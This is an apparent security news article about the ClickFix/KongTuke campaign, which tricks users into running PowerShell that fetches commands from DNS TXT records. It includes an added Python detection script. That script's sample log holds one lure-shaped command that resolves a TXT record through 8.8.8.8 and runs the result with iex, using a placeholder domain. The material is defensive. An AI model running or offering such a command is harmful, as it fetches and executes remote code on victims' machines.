Netcrook

DNS Sleight of Hand: How ClickFix’s New KongTuke Variant Outsmarts Cyber Defenses

Published: 05 February 2026 06:01
Category: Security Awareness & Social Engineering
Author: CRYSTALPROXY

Subtitle: Cybercriminals are hiding malware inside DNS records and tricking victims into running it, bypassing classic security controls.

It starts with a simple, familiar test: “Prove you’re human.” But behind this innocuous challenge lies a sophisticated new cyberattack that’s rewriting the playbook on evasion. In a series of recent incidents, attackers have weaponized the humble DNS TXT record, using it as a covert channel to deliver malicious PowerShell commands straight onto unsuspecting victims’ machines. Welcome to the era of KongTuke: a cunning evolution of the persistent ClickFix campaign.

Since late December 2025, security analysts have observed a worrying shift in social engineering tactics. The ClickFix campaign, previously known for its deceptive browser update and CAPTCHA prompts, has adopted a new method of payload delivery. Rather than asking for passwords or exploiting browser vulnerabilities, KongTuke lures users into copying and pasting a PowerShell command, conveniently preloaded into their clipboard by the attacker’s JavaScript.

The trick is ingeniously simple. When a victim lands on a compromised or fake site, they’re told to open the Windows Run dialog and paste in a mysterious command. This command doesn’t fetch malware from a conventional website. Instead, it queries a specially crafted DNS TXT record (essentially a hidden text message stored in the Domain Name System) using PowerShell’s Resolve-DnsName cmdlet. By retrieving and immediately executing the contents of this DNS record, the attack sidesteps web filters, firewalls, and many endpoint protections.

To further muddy the waters, the command routes its DNS request through Google’s 8.8.8.8 resolver, bypassing local DNS blocks or security appliances. For network defenders, the traffic appears as a routine DNS query, nothing to raise alarms, while the payload is quietly assembled and executed on the victim’s machine. The result? A second-stage download, often an info-stealer or further malware, is unleashed without ever touching a suspicious URL.

What makes KongTuke especially dangerous is its dynamic targeting. Malicious content is injected only for specific visitors, allowing compromised domains to stay under the radar for days. Security researchers warn organizations to watch for unusual PowerShell executions, especially those involving Resolve-DnsName and iex, and to educate users: no legitimate site will ever ask them to paste commands into the Windows Run dialog.
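Detection logic for the PowerShell pattern the researchers describe, as an added example that is not part of the original article: it scores process-creation command lines (constructed sample log lines, placeholder domain) for a Resolve-DnsName TXT lookup, the 8.8.8.8 resolver and iex, and raises an alert only when the lookup and in-line execution appear together. The indicator weights and the pipe-delimited log format are this example's own assumptions.

```python
import re

# Indicators for the behaviours the article names (Resolve-DnsName TXT lookup,
# 8.8.8.8 resolver, iex execution, policy bypass); weights are this example's own.
INDICATORS = [
    ("resolve_dnsname", re.compile(r"resolve-dnsname", re.I), 2),
    ("txt_record", re.compile(r"-(?:type|querytype)\s+txt\b", re.I), 1),
    ("external_resolver", re.compile(r"-server\s+8\.8\.8\.8\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I), 1),
]

def score_command_line(cmd: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one process command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits

def classify(hits: list[str]) -> str:
    """'alert' when DNS lookup and in-line execution co-occur (the KongTuke chain)."""
    dns, execute = "resolve_dnsname" in hits, "invoke_expression" in hits
    if dns and execute:
        return "alert"
    return "review" if dns or execute else "benign"

def triage(log_text: str) -> list[dict]:
    """Parse 'timestamp|host|parent|command line' rows into findings with evidence."""
    findings = []
    for raw in log_text.splitlines():
        ts, host, parent, cmd = raw.split("|", 3)
        score, hits = score_command_line(cmd)
        # The Run dialog spawns its child from explorer.exe: the lure path the article describes.
        if parent.lower() == "explorer.exe" and hits:
            hits.append("launched_from_explorer")
            score += 1
        findings.append({"ts": ts, "host": host, "verdict": classify(hits),
                         "score": score, "hits": hits})
    return findings

# Constructed sample log: a routine command, an admin checking a TXT record,
# and one line shaped like the ClickFix/KongTuke lure (domain is a placeholder).
SAMPLE_LOG = (
    '2026-02-04T09:12:01Z|ws-17|explorer.exe|powershell.exe -NoProfile -Command "Get-Process"\n'
    '2026-02-04T09:14:33Z|ws-17|powershell.exe|powershell.exe Resolve-DnsName -Type TXT example.com\n'
    '2026-02-04T09:20:48Z|ws-23|explorer.exe|powershell.exe -ep bypass -c '
    '"iex ((Resolve-DnsName -Type TXT -Server 8.8.8.8 <placeholder-domain>).Strings)"\n'
)

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG): print(f["verdict"], f["score"], f["host"], f["hits"])
```

The second sample line lands in "review" rather than "alert" because a TXT lookup on its own is routine administration; only the combination with iex is treated as the attack chain.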

The rise of DNS abuse in malware delivery is a reminder that attackers are always searching for overlooked channels. As cybercriminals turn everyday protocols into covert conduits, defenders must adapt, scrutinizing not just what users click, but what they’re persuaded to run. In the battle for trust, a simple “human verification” can be the most dangerous trick of all.

WIKICROOK

  • DNS TXT Record: A DNS TXT record stores text information in the Domain Name System, often for email security, but can be misused to hide data or commands.
  • PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often exploit it to perform malicious actions stealthily.
  • Clipboard Injection: Clipboard injection replaces clipboard content with malicious data, tricking users into pasting harmful code or links. It’s a stealthy and dangerous cyber threat.
  • Execution Policy Bypass: Execution policy bypass lets users run PowerShell scripts by disabling built-in security restrictions, often exploited in cyberattacks to execute unauthorized code.
  • Info Stealer: An info stealer is malware that secretly collects sensitive data like passwords and financial details from infected devices and sends it to cybercriminals.